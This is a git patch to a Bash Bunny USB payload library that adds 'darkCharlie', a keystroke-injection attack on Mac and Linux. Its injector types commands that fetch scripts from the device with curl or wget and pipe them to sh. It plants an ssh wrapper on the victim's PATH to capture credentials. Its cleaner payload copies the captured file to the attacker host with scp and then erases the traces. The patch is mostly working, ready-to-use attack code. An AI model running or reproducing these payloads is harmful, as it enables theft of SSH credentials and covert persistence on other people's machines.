From 77b1a4e1230dc6fe9bb3ee110b900258aeb2d6c3 Mon Sep 17 00:00:00 2001 From: Michael Weinstein Date: Tue, 19 Sep 2017 23:47:21 -0700 Subject: [PATCH] Now with injection and cleaning --- .../darkCharlie/cleaner/payload.txt | 66 ++++++++++++++++ .../{ssh.py => injector/darkCharlie.py} | 0 .../darkCharlie/injector/payload.txt | 79 +++++++++++++++++++ .../credentials/darkCharlie/injector/post.sh | 9 +++ .../credentials/darkCharlie/injector/pre.sh | 11 +++ 5 files changed, 165 insertions(+) create mode 100644 payloads/library/credentials/darkCharlie/cleaner/payload.txt rename payloads/library/credentials/darkCharlie/{ssh.py => injector/darkCharlie.py} (100%) create mode 100644 payloads/library/credentials/darkCharlie/injector/payload.txt create mode 100644 payloads/library/credentials/darkCharlie/injector/post.sh create mode 100644 payloads/library/credentials/darkCharlie/injector/pre.sh diff --git a/payloads/library/credentials/darkCharlie/cleaner/payload.txt b/payloads/library/credentials/darkCharlie/cleaner/payload.txt new file mode 100644 index 00000000..db71f259 --- /dev/null +++ b/payloads/library/credentials/darkCharlie/cleaner/payload.txt @@ -0,0 +1,66 @@ +#!/bin/bash + +# Title: darkCharlie{Cleaner} +# Author: Michael Weinstein +# Target: Mac/Linux +# Version: 0.1 +# +# Get the ssh creds from our loot collection. +# And clean up after +# +# White | Ready +# Blue blinking | Attacking +# Green | Finished + +LED SETUP + +#setup the attack on macos (if false, attack is for Linux) +mac=false + +if [ "$mac" = true ] +then + ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E +else + ATTACKMODE ECM_ETHERNET HID +fi + +DUCKY_LANG us + +GET SWITCH_POSITION +GET HOST_IP + +cd /root/udisk/payloads/$SWITCH_POSITION/ +LOOT=/root/udisk/loot/darkCharlie +mkdir -p $LOOT + +LED ATTACK + +if [ "$mac" = true ] +then + RUN OSX terminal +else + RUN UNITY xterm +fi +QUACK DELAY 2000 + +QUACK STRING scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \~/.config/ssh/ssh.conf root@$HOST_IP:$LOOT/\$USER.sudo.passwd #nice hiding of known host info +QUACK DELAY 200 +QUACK ENTER +QUACK DELAY 500 +QUACK STRING hak5bunny +QUACK DELAY 200 +QUACK ENTER +QUACK DELAY 500 +if [ "$mac" = true ] +then + QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bash_profile +else + QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bashrc +fi +QUACK ENTER +QUACK DELAY 200 +QUACK STRING exit +QUACK DELAY 200 +QUACK ENTER +LED SUCCESS +#See you, space cowboy... \ No newline at end of file diff --git a/payloads/library/credentials/darkCharlie/ssh.py b/payloads/library/credentials/darkCharlie/injector/darkCharlie.py similarity index 100% rename from payloads/library/credentials/darkCharlie/ssh.py rename to payloads/library/credentials/darkCharlie/injector/darkCharlie.py diff --git a/payloads/library/credentials/darkCharlie/injector/payload.txt b/payloads/library/credentials/darkCharlie/injector/payload.txt new file mode 100644 index 00000000..a59c6d07 --- /dev/null +++ b/payloads/library/credentials/darkCharlie/injector/payload.txt @@ -0,0 +1,79 @@ +#!/bin/bash + +# Title: darkCharlie +# Author: Michael Weinstein +# Target: Mac/Linux +# Version: 0.1 +# +# Create a wrapper for ssh sessions that +# will live inside ~/.config/ssh and be added +# tn the $PATH. +# +# This payload was inspired greatly by SudoBackdoor +# and much of the code here was derived (or copied +# wholesale) from that with great thanks to oXis. +# +# White | Ready +# Amber blinking | Waiting for server +# Blue blinking | Attacking +# Green | Finished + +LED SETUP + +#setup the attack on macos (if false, attack is for Linux) +mac=false + +if [ "$mac" = true ] +then + ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E +else + ATTACKMODE ECM_ETHERNET HID +fi + +DUCKY_LANG us + +GET SWITCH_POSITION +GET HOST_IP + +cd /root/udisk/payloads/$SWITCH_POSITION/ + +# starting server +LED SPECIAL + +iptables -A OUTPUT -p udp --dport 53 -j DROP +python -m SimpleHTTPServer 80 & + +# wait until port is listening (credit audibleblink) +while ! nc -z localhost 80; do sleep 0.2; done +# that was brilliant! + +LED ATTACK + +if [ "$mac" = true ] +then + RUN OSX terminal +else + RUN UNITY xterm +fi +QUACK DELAY 2000 + +if [ "$mac" = true ] +then + QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh + QUACK STRING curl "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh + QUACK STRING curl "http://$HOST_IP/post.sh" \| sh + QUACK STRING ~/.config/ssh/ssh --initializeScript +else + QUACK STRING wget -O - "http://$HOST_IP/pre.sh" \| sh #I think wget defaults to outputting to a file and needs explicit instructions to output to STDOUT + QUACK STRING wget -O - "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh #Will test this on a mac when I finish up + QUACK STRING wget -O - "http://$HOST_IP/post.sh" \| sh + QUACK STRING ~/.config/ssh/ssh --initializeScript +fi + +QUACK DELAY 200 +QUACK ENTER +QUACK DELAY 200 +QUACK STRING exit +QUACK DELAY 200 +QUACK ENTER +LED SUCCESS #The Dungeons and Dragons tattoo hath rolled a 20 diff --git a/payloads/library/credentials/darkCharlie/injector/post.sh b/payloads/library/credentials/darkCharlie/injector/post.sh new file mode 100644 index 00000000..bff63547 --- /dev/null +++ b/payloads/library/credentials/darkCharlie/injector/post.sh @@ -0,0 +1,9 @@ +#!/bin/bash + +chmod u+x ~/.config/sudo/sudo +if [ -f ~/.bash_profile ] +then + echo "export PATH=~/.config/ssh:$PATH" >> ~/.bash_profile +else + echo "export PATH=~/.config/ssh:$PATH" >> ~/.bashrc +fi \ No newline at end of file diff --git a/payloads/library/credentials/darkCharlie/injector/pre.sh b/payloads/library/credentials/darkCharlie/injector/pre.sh new file mode 100644 index 00000000..06431c18 --- /dev/null +++ b/payloads/library/credentials/darkCharlie/injector/pre.sh @@ -0,0 +1,11 @@ +#!/bin/bash + +if [ ! -d ~/.config/ssh ] +then + mkdir -p ~/.config/ssh +fi + +if [ -f ~/.config/ssh/ssh ] +then + rm ~/.config/ssh/ssh +fi \ No newline at end of file